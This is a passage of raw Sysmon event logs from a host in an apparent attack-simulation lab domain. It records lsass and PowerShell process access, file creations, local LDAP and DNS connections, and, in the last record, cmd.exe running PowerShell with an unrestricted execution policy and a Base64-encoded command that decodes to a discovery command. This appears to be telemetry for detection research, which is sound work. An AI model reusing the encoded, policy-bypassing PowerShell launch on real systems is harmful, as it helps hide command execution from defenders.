indows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003514Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.799{266CAFBE-646A-6064-0B00-00000000AE01}8562292C:\Windows\system32\lsass.exe{266CAFBE-6497-6064-8900-00000000AE01}4832C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
23542300x80000000000000003513Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.799{266CAFBE-646A-6064-0B00-00000000AE01}856NT AUTHORITY\SYSTEMC:\Windows\system32\lsass.exeC:\Windows\System32\config\netlogon.dnsMD5=6E1503F4069613AB8064509A55137640,SHA256=FE42D2C661087DD60C360AFAA648FC33F5C1B0D70422F7EC5477A6CE52712C05,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000003512Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.799{266CAFBE-646A-6064-0B00-00000000AE01}856NT AUTHORITY\SYSTEMC:\Windows\system32\lsass.exeC:\Windows\System32\config\netlogon.dnbMD5=EB0AEBE425E3FDDDEAE26D39724C2D5C,SHA256=9A6546105A5CFDBD5CFAF22CEAF3862583583ACCF855046E0686BD5DFA98BB29,IMPHASH=00000000000000000000000000000000falsetrue 17141700x80000000000000003511Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-CreatePipe2021-03-31 12:01:27.783{266CAFBE-6497-6064-8900-00000000AE01}4832\PSHost.132616656877125878.4832.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x80000000000000003510Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.768{266CAFBE-6497-6064-8900-00000000AE01}4832ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_ppw23kqr.r0f.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000003509Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:27.768{266CAFBE-6497-6064-8900-00000000AE01}4832ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_yhfd0sx5.s1c.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000003508Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.752{266CAFBE-6497-6064-8900-00000000AE01}4832C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_yhfd0sx5.s1c.ps12021-03-31 12:01:27.752 10341000x80000000000000003507Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.752{266CAFBE-646A-6064-0B00-00000000AE01}856888C:\Windows\system32\lsass.exe{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\system32\dns.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96fe2|C:\Windows\system32\kerberos.DLL+794d4|C:\Windows\system32\kerberos.DLL+144c9|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+2b3f4|C:\Windows\system32\lsasrv.dll+304a5|C:\Windows\system32\lsasrv.dll+2e33b|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+15e0d|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 354300x80000000000000003506Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:25.684{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.14win-dc-892.attackrange.local49722-false10.0.1.14win-dc-892.attackrange.local389ldap 354300x80000000000000003505Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:25.684{266CAFBE-6495-6064-8100-00000000AE01}4272C:\Windows\System32\taskhostw.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local49722-false10.0.1.14win-dc-892.attackrange.local389ldap 354300x80000000000000003504Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:25.671{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.14win-dc-892.attackrange.local49721-false10.0.1.14win-dc-892.attackrange.local389ldap 354300x80000000000000003503Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:25.671{266CAFBE-6495-6064-8100-00000000AE01}4272C:\Windows\System32\taskhostw.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local49721-false10.0.1.14win-dc-892.attackrange.local389ldap 354300x80000000000000003502Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:25.654{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local55261- 10341000x80000000000000003501Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:27.736{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-6497-6064-8900-00000000AE01}4832C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003500Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.736{266CAFBE-646A-6064-0B00-00000000AE01}8561016C:\Windows\system32\lsass.exe{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\system32\dns.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96fe2|C:\Windows\system32\kerberos.DLL+794d4|C:\Windows\system32\kerberos.DLL+144c9|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+2b3f4|C:\Windows\system32\lsasrv.dll+304a5|C:\Windows\system32\lsasrv.dll+2e33b|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+15e0d|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTE
M32\ntdll.dll+1d34e 10341000x80000000000000003499Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.736{266CAFBE-646A-6064-0B00-00000000AE01}8561016C:\Windows\system32\lsass.exe{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\system32\dns.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96fe2|C:\Windows\system32\kerberos.DLL+794d4|C:\Windows\system32\kerberos.DLL+144c9|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+2b3f4|C:\Windows\system32\lsasrv.dll+304a5|C:\Windows\system32\lsasrv.dll+2e33b|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+15e0d|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000003498Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:27.721{266CAFBE-646A-6064-0B00-00000000AE01}8562292C:\Windows\system32\lsass.exe{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1d1e8|C:\Windows\system32\lsasrv.dll+1c411|C:\Windows\system32\lsasrv.dll+1ac30|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003497Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:27.721{266CAFBE-646A-6064-0B00-00000000AE01}8562292C:\Windows\system32\lsass.exe{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+19616|C:\Windows\system32\lsasrv.dll+1abbf|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003496Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.721{266CAFBE-646A-6064-0B00-00000000AE01}8562292C:\Windows\system32\lsass.exe{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
10341000x80000000000000003495Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.705{266CAFBE-6497-6064-8700-00000000AE01}12202076C:\Windows\system32\conhost.exe{266CAFBE-6497-6064-8900-00000000AE01}4832C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003494Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.705{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003493Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:27.705{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003492Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.705{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003491Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:27.705{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003490Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.705{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003489Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:27.705{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003488Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.705{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003487Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:27.705{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003486Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.705{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003485Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:27.705{266CAFBE-6469-6064-0500-00000000AE01}624740C:\Windows\system32\csrss.exe{266CAFBE-6497-6064-8900-00000000AE01}4832C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000003484Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.705{266CAFBE-6497-6064-8800-00000000AE01}48124644C:\Windows\system32\cmd.exe{266CAFBE-6497-6064-8900-00000000AE01}4832C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000003483Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.712{266CAFBE-6497-6064-8900-00000000AE01}4832C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEPowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand dwBoAG8AYQBtAGkAC:\Users\Administrator\ATTACKRANGE\Administrator{266CAFBE-6497-6064-FF70-070000000000}0x770ff0HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{266CAFBE-6497-6064-8800-00000000AE01}4812C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand dwBoAG8AYQBtAGkA 
